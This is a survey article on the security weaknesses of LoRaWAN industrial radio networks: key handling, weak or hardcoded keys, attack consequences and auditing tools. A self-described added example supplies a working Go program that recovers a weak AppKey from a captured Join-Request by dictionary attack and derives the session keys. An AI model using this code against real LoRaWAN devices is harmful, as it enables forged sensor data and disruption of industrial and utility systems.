Cybersecurity Survey of LoRa and LoRaWAN Industrial Radio
By Leonard Jacobs, M.S. in Cybersecurity Technology, CISSP, CSSA
This is the first article in a series of articles discussing cybersecurity of industrial control wireless technology.
LoRa (Long Range) is a proprietary physical-layer radio modulation technique based on chirp spread spectrum. It was developed by Cycleo, a company of Grenoble, France, which was later acquired by Semtech. LoRaWAN defines the communication protocol and system architecture that run on top of the LoRa physical layer.
LoRaWAN is a low-power, wide-area networking (LPWAN) protocol built on top of the LoRa radio modulation technique. It connects battery-powered devices to the internet wirelessly and manages communication between end devices and network gateways. It is often used in geographically dispersed manufacturing facilities and is also found in agricultural applications.
LoRa radio can carry small data or control messages over a distance of about 12 kilometers under line-of-sight conditions.
The LoRa Alliance, the non-profit organization behind the LoRaWAN standard, declares there are currently well over 100 million devices using LoRaWAN all around the world and it estimates that the number will reach 730 million by 2023.
In a LoRaWAN architecture, end devices communicate with applications via gateways and network servers. End devices exchange messages with gateways over LoRa radio using the LoRaWAN protocol; gateways forward those frames unchanged to the network server over IP (UDP or TCP, depending on the gateway protocol) and hold no keys themselves. The network server routes traffic from end devices to application servers and is responsible for device authentication and authorization.
The most widely deployed versions of the specification are 1.0.2 and 1.0.3. The latest major version, 1.1, introduces several cybersecurity improvements, among them separate network and application root keys and replay protection for the join procedure.
LoRaWAN uses network-layer security to authenticate a device to the network (a Message Integrity Code, MIC, on every frame) and application-layer security to keep the payload exchanged between an end device and its application server confidential, even from the network operator. These layers rely on two AES-128 secrets: the Network Session Key (NwkSKey), which computes the MIC, and the Application Session Key (AppSKey), which encrypts the application payload.
The LoRaWAN protocol offers two methods for activating a device and establishing these session keys:
- Activation by Personalization (ABP), in which both session keys, the device address and other identification data are hardcoded in the firmware or configured at manufacture, so they never change over the life of the device.
- Over-the-Air Activation (OTAA), in which each device is provisioned with a unique AES-128 root key called the AppKey. The AppKey is used to compute the MIC of the Join-Request and Join-Accept messages exchanged when a device joins a network, and both sides derive fresh session keys (NwkSKey and AppSKey) from it, so the root key itself is never sent over the air.
The security of a LoRaWAN network depends on these keys being kept secret. Although version 1.1 of the protocol introduces cybersecurity enhancements over earlier versions, LoRaWAN systems are often exposed to attacks because of implementation issues and poor key management.
Cybersecurity researchers have found that keys can be extracted from devices through reverse engineering. Many end devices also carry physical tags or labels printed with vital information such as the DevEUI and AppKey. These tags are meant to be used only during the commissioning process. If a tag is not removed after commissioning, an attacker with physical access can read it and use the information to compute the device's session keys.
Researchers have also discovered source code that includes hardcoded AppKeys, NwkSKeys and AppSKeys. Keys that appear in sample code or in a firmware image shared by many devices should be replaced with per-device values before deployment. Furthermore, AppKeys are sometimes generated with too little entropy (all zeros, sequential bytes, a vendor default), which makes it feasible for an attacker to recover them by trying a short dictionary of likely keys against the MIC of a captured Join-Request.
Other cybersecurity researchers have reported finding many internet-exposed LoRaWAN network servers that use default or weak credentials, making it easy for attackers to log in and obtain the keys stored there. Servers may also run software with known vulnerabilities or be misconfigured, which likewise allows attackers to obtain the keys.
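The join procedure and the weak-key problem described above can be seen concretely in code. The following is an added example, not code from the article or from any of the tools it discusses: it implements AES-CMAC (RFC 4493) on top of Go's standard-library AES, builds a LoRaWAN 1.0.x Join-Request, computes its MIC with the AppKey, then plays the attacker's side by replaying that MIC computation with a constructed dictionary of weak keys against the captured frame. Once the AppKey is recovered it derives NwkSKey and AppSKey exactly as a 1.0.x device does after a Join-Accept. The EUIs, DevNonce, AppNonce, NetID and the dictionary contents are all constructed sample values, and the frame layout and derivation formulas follow the LoRaWAN 1.0.x specification (EUIs and nonces are taken here already in on-air, little-endian byte order).

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

func xorInto(dst, src []byte) {
	for i := range dst {
		dst[i] ^= src[i]
	}
}

// aesCMAC is AES-128 CMAC (RFC 4493), the primitive behind every LoRaWAN MIC.
func aesCMAC(key, msg []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	// Subkeys: L = AES(K, 0^128); K1 = L<<1, K2 = K1<<1, reduced by 0x87 on overflow.
	dbl := func(in []byte) []byte {
		out := make([]byte, 16)
		var carry byte
		for i := 15; i >= 0; i-- {
			out[i] = in[i]<<1 | carry
			carry = in[i] >> 7
		}
		if carry == 1 {
			out[15] ^= 0x87
		}
		return out
	}
	l := make([]byte, 16)
	block.Encrypt(l, l)
	k1 := dbl(l)
	k2 := dbl(k1)
	n := (len(msg) + 15) / 16
	if n == 0 {
		n = 1
	}
	last := make([]byte, 16)
	start := (n - 1) * 16
	copy(last, msg[start:])
	if len(msg) > 0 && len(msg)%16 == 0 {
		xorInto(last, k1) // complete final block
	} else {
		last[len(msg)-start] = 0x80 // 10* padding of a partial final block
		xorInto(last, k2)
	}
	x := make([]byte, 16) // CBC-MAC over all but the last block, then the adjusted last block
	for i := 0; i < n-1; i++ {
		xorInto(x, msg[i*16:(i+1)*16])
		block.Encrypt(x, x)
	}
	xorInto(x, last)
	block.Encrypt(x, x)
	return x
}

// JoinRequestPayload builds MHDR|AppEUI|DevEUI|DevNonce of a LoRaWAN 1.0.x Join-Request.
func JoinRequestPayload(appEUI, devEUI []byte, devNonce uint16) []byte {
	b := []byte{0x00} // MHDR: MType Join-Request, Major LoRaWAN R1
	b = append(b, appEUI...)
	b = append(b, devEUI...)
	nonce := make([]byte, 2)
	binary.LittleEndian.PutUint16(nonce, devNonce)
	return append(b, nonce...)
}

// JoinMIC is the 4-byte MIC the device appends: first 4 bytes of aes128_cmac(AppKey, payload).
func JoinMIC(appKey, payload []byte) []byte {
	return aesCMAC(appKey, payload)[:4]
}

// CrackAppKey recomputes the MIC of a captured Join-Request (payload followed by its
// MIC) under each candidate key and returns the first one that verifies, or nil.
func CrackAppKey(frame []byte, candidates [][]byte) []byte {
	body, mic := frame[:len(frame)-4], frame[len(frame)-4:]
	for _, k := range candidates {
		if bytes.Equal(JoinMIC(k, body), mic) {
			return k
		}
	}
	return nil
}

// DeriveSessionKeys follows LoRaWAN 1.0.x:
//   NwkSKey = aes128_encrypt(AppKey, 0x01|AppNonce|NetID|DevNonce|pad16)
//   AppSKey = aes128_encrypt(AppKey, 0x02|AppNonce|NetID|DevNonce|pad16)
func DeriveSessionKeys(appKey, appNonce, netID []byte, devNonce uint16) (nwkSKey, appSKey []byte) {
	block, err := aes.NewCipher(appKey)
	if err != nil {
		panic(err)
	}
	derive := func(tag byte) []byte {
		in := make([]byte, 16) // zero padding to one AES block
		in[0] = tag
		copy(in[1:4], appNonce)
		copy(in[4:7], netID)
		binary.LittleEndian.PutUint16(in[7:9], devNonce)
		out := make([]byte, 16)
		block.Encrypt(out, in)
		return out
	}
	return derive(0x01), derive(0x02)
}

// WeakAppKeys is a constructed sample dictionary of the kind of keys found hardcoded in
// firmware or left at defaults; a real audit would use a much larger list.
var WeakAppKeys = [][]byte{
	mustHex("00000000000000000000000000000000"),
	mustHex("ffffffffffffffffffffffffffffffff"),
	mustHex("0102030405060708090a0b0c0d0e0f10"),
	mustHex("2b7e151628aed2a6abf7158809cf4f3c"), // the AES test-vector key, often copied into sample configs
}

func main() {
	appKey := WeakAppKeys[3] // constructed device whose firmware shipped with a dictionary key
	payload := JoinRequestPayload(mustHex("0000000000000001"), mustHex("0807060504030201"), 0x1234)
	frame := append(append([]byte{}, payload...), JoinMIC(appKey, payload)...)
	fmt.Printf("captured Join-Request: %x\n", frame)
	if k := CrackAppKey(frame, WeakAppKeys); k != nil {
		fmt.Printf("AppKey recovered: %x\n", k)
		// The same AppKey decrypts the Join-Accept, so AppNonce and NetID are readable too.
		nwk, app := DeriveSessionKeys(k, mustHex("a1b2c3"), mustHex("000013"), 0x1234)
		fmt.Printf("NwkSKey=%x AppSKey=%x\n", nwk, app)
	}
}
```

Nothing in this attack touches the radio layer or the network server: a single passively captured Join-Request is enough to test a candidate key, which is why a per-device, randomly generated AppKey (and the removal of printed key labels after commissioning) is the control that matters.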
Cyber-attacks can have serious consequences in control systems. If communication between a smart water meter and the network is compromised, malicious actors could manipulate the billing for the utilities. Likewise, an attack on a highway monitoring sensor could affect motorists’ safety and security.
Keys can also be obtained by breaching the networks of device manufacturers, attacking the devices used by technicians to configure LoRaWAN systems, and breaching service providers.
Once an attacker has obtained the keys, they can launch denial-of-service (DoS) attacks against devices and the network server, or inject forged data that carries a valid MIC and is therefore accepted by the network. In industrial control networks this can have serious consequences: processes acting on falsified sensor readings could fail, and chemical manufacturing batches could be ruined. Because of its low-power wide-area capabilities the technology is also used in smart city applications such as traffic signaling and street lighting control, where the same attacks apply.
Security tools for LoRaWAN were still few and far between as of 2020. A major cybersecurity firm released a framework called LAF (LoRaWAN Auditing Framework), which can parse, send, craft, analyze and audit LoRaWAN traffic and crack some LoRaWAN packets protected by weak or default keys. The framework still has limitations to overcome:
- It only works through a gateway
- It can only listen to uplink packets
- It can only listen to 8 of the 64 channels
- Packet generation and fuzzing depend on the LoRaWAN Go library and its rigid JSON packet format
Another tool, LoRa Craft, intercepts packets using software-defined radio (SDR) and crafts packets using dedicated LoRaWAN v1.0 and v1.1 layers. This tool is largely do-it-yourself and needs much more support than the tools already released, such as crypto helpers for Join-Accept payloads and the Message Integrity Code (MIC), which would help in cracking weak keys.
A newer framework, ChirpOTLE, can demonstrate two attacks on the availability of LoRaWAN networks: time drifting of the Class B beacon, and a novel Adaptive Data Rate (ADR) spoofing attack that manipulates frame metadata. The researchers' setup is limited to a few default channels for demonstrating each attack with each node.
This shows that while security tooling is being developed, comprehensive and easily accessible protection for LoRaWAN still has some distance to go.
For more information on this topic, see: link